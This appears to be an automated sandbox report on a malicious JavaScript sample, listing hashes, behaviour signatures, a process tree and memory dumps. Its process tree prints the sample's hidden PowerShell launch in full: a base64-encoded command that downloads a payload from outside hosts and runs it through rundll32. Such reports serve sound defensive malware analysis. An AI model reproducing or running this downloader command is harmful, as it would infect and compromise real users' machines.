Analysis

  • max time kernel
    27s
  • max time network
    31s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    16-05-2023 01:19

General

  • Target

    7daeead9495651433e9a5aa4c9fb74bdc741624c57898a0cda3c74447176955b.js

  • Size

    169KB

  • MD5

    677b6481f8fe02de33603553b9ee1b2e

  • SHA1

    1d856b877ff18d5f2777a53421c1084c39dbfd6a

  • SHA256

    7daeead9495651433e9a5aa4c9fb74bdc741624c57898a0cda3c74447176955b

  • SHA512

    74775d7170a961c73889279399974505af63c7d4bb8abbabef10754fb5c61bec6c9fed559947dbb28ff47228ff279322cbc91f1f10676ce6b379cfe2fbf139bb

  • SSDEEP

    3072:IcRjXS0ZkD3FtfRRuTXj3fpby2JKfvf25w206IzIXyl56ExfomXDHiZBtm:vXtkD3FPwTzPpe2JKnf25w2CzIXyl568

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\7daeead9495651433e9a5aa4c9fb74bdc741624c57898a0cda3c74447176955b.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1948
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\7daeead9495651433e9a5aa4c9fb74bdc741624c57898a0cda3c74447176955b.js" furcilia conglomeriticCremant ohioanBelonoid NotitionPreinterceding
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1240
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JAB0AG8AdQBjAGgAbwB1AHMAIAA9ACAANwA3ADkAOwAkAEIAbABvAHcAcABpAHAAZQBMAGEAdAByAGkAcwAgAD0AIAAiAGMAbwBlAGwAZQBsAG0AaQBuAHQAaABpAGMAIgA7ACQASABhAHQAYgByAHUAcwBoAE0AYQB6AGEAZQBkAGkAdQBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATgBRAEEAdQBBAEQARQBBAE0AdwBBAHcAQQBDADQAQQBNAFEAQQB5AEEARABjAEEATABnAEEAeQBBAEQARQBBAE0AZwBBAD0AcABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAUQBCAGkAQQBHADQAQQBhAFEAQgAyAEEARwBVAEEAWQBRAEIAdQBBAEUARQBBAFoAUQBCAHkAQQBHADgAQQBjAEEAQgBvAEEARwA4AEEAWQBnAEIAcABBAEcATQBBAEwAZwBCAHMAQQBHAGsAQQBaAHcAQgBvAEEASABRAEEAYQBRAEIAdQBBAEcAYwBBAHAAQwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBaAHcAQgBsAEEARwA0AEEAWgBRAEIAMABBAEcAawBBAFkAdwBCAFEAQQBIAFUAQQBiAEEAQgBoAEEARwBvAEEAWQBRAEIAdQBBAEMANABBAGEAQQBCAHYAQQBIAE0AQQBjAEEAQgBwAEEASABRAEEAWQBRAEIAcwBBAEEAPQA9AHAAQwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAFkAQQBMAGcAQQB4AEEARABNAEEATgB3AEEAdQBBAEQASQBBAE4AQQBBAHoAQQBDADQAQQBNAFEAQQA1AEEARABjAEEAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMAA7ACQAcgBlAGYAbwByAG0AYQBkAG8AIAA9ACAAMQA3ADAAOwAkAE0AaQBkAG8AYwBlAGEAbgAgAD0AIAA5ADIANAA7ACQAdQBuAGQAZQBiAGEAdABlAGQAIAA9ACAAIgBBAG4AdABpAGEAbgBhAHIAYwBoAGkAYwAiADsAJABMAGkAZwBoAHQAcwBvAG0AZQBsAHkAVABhAGwAYQBiAG8AbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAawBBAE8AQQBBAHYAQQBIAEUAQQBaAGcAQgBpAEEARwBZAEEAZABRAEEAdgBBAEUAcwBBAE4AdwBBADEAQQBEAFkAQQBTAFEAQgA0AEEAQQA9AD0AUwA9AHcASQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAFUAQQBPAEEAQQB2AEEASABVAEEAVgBnAEIAMwBBAEcAMABBAE0AQQBCAEIAQQBDADgAQQBiAEEAQQAzAEEARgBZAEEAVAB3AEIATABBAEgARQBBAE4AZwBCAEIAQQBIAEEAQQBiAEEAQgBEAEEARQAwAEEAUwA9AHcASQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAGsAQQBPAEEAQQB2AEEARQBFAEEAUgB3AEIAMgBBAEYAbwBBAGEAQQBBADQAQQBFAE0AQQBMAHcAQgBWAEEARwBFAEEAWgBnAEIAbwBBAEUAbwBBAGQAUQBCAHAAQQBFAGcAQQBUAFEAQQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAHQAaAByAG8AZABkAGUAbgAgAGkAbgAgACQATABpAGcAaAB0AHMAbwBtAGUAbAB5AFQAYQBsAGEAYgBvAG4AIAAtAHMAcABsAGkAdAAgACIAUwA9AHcASQAiACkAIAB7ACQAaQBuAGMAbwByAHIAdQBwAHQAaQBiAGkAbABpAHQAeQBVAG4AdwByAGUAYQB0AGgAaQBuAGcAIAA9ACAAOQA2ADkAOwB0AHIAeQAgAHsAJABVAG4AZQBtAGIAYQBuAGsAZQBkAEUAbgB0AGUAcgBvAG0AZQBzAGUAbgB0AGUAcgBpAGMAIAA9ACAANwA4ADAAOwAkAHMAaAByAGkAZQB2AGUAZABDAGwAbwB0AHUAcgBpAG4AZwAgAD0AIAAiAGIAZQBzAHQAcgBvAHcAaQBuAGcAVABvAHAAaQBhAHIAeQAiADsAJABIAG8AcABwAGUAcgBnAHIAYQBzAHMAQwBhAG0AbQBvAGMAawAgAD0AIAAyADgANQA7ACQAYQB3AGUAcwBvAG0AZQBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdABoAHIAbwBkAGQAZQBuACkAKQA7AHcAZwBlAHQAIAAkAGEAdwBlAHMAbwBtAGUAbAB5ACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYQBkAGkAYQBwAGgAbwByAGkAdABlAFAAbwB0AHMAdABpAGMAawAuAGcAZQBvAGwAbwBnAGkAcwB0ADsAJAB2AGUAcgBiAGEAbABpAHMAbQAgAD0AIAAiAGIAbwByAGEAYgBsAGUAIgA7ACQAVAByAG8AcABoAGUAbQBhACAAPQAgADUANwA5ADsAJABlAHMAdABhAG4AYwBpAGEAcwAgAD0AIAAiAEYAYQBpAHQAaABiAHIAZQBhAGsAZQByAE8AbwBlAGMAaQBhACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYQBkAGkAYQBwAGgAbwByAGkAdABlAFAAbwB0AHMAdABpAGMAawAuAGcAZQBvAGwAbwBnAGkAcwB0ACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAxADMANgA2ADcAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBRAHcAQQA2AEEARgB3AEEAVQBBAEIAeQBBAEcAOABBAFoAdwBCAHkAQQBHAEUAQQBiAFEAQgBFAEEARwBFAEEAZABBAEIAaABBAEYAdwBBAFkAUQBCAGsAQQBHAGsAQQBZAFEAQgB3AEEARwBnAEEAYgB3AEIAeQBBAEcAawBBAGQAQQBCAGwAQQBGAEEAQQBiAHcAQgAwAEEASABNAEEAZABBAEIAcABBAEcATQBBAGEAdwBBAHUAQQBHAGMAQQBaAFEAQgB2AEEARwB3AEEAYgB3AEIAbgBBAEcAawBBAGMAdwBCADAAQQBDAHcAQQBjAEEAQgB5AEEARwBrAEEAYgBnAEIAMABBAEQAcwBBACIAOwAkAEIAbABhAGMAawBiAGEAbABsAGUAcgBIAG8AbQBvAHQAbwBuAGkAYwAgAD0AIAA1ADkANAA7AGIAcgBlAGEAawA7AH0AUgBlAGEAYwB0AEQATwBNADsAfQAgAGMAYQB0AGMAaAAgAHsAJABhAGwAYQBtAGUAZABhAHMAIAA9ACAAMwA1ADcAOwB9AH0AJABTAHkAbgBhAG4AZwBpAHUAbQAgAD0AIAAiAGkAbQBwAG8AdQBuAGQAaQBuAGcAIgA7AA=="
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1424

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1424-58-0x000000001B1F0000-0x000000001B4D2000-memory.dmp

    Filesize

    2.9MB

  • memory/1424-59-0x0000000002390000-0x0000000002398000-memory.dmp

    Filesize

    32KB

  • memory/1424-60-0x0000000002550000-0x00000000025D0000-memory.dmp

    Filesize

    512KB

  • memory/1424-61-0x0000000002550000-0x00000000025D0000-memory.dmp

    Filesize

    512KB

  • memory/1424-62-0x0000000002550000-0x00000000025D0000-memory.dmp

    Filesize

    512KB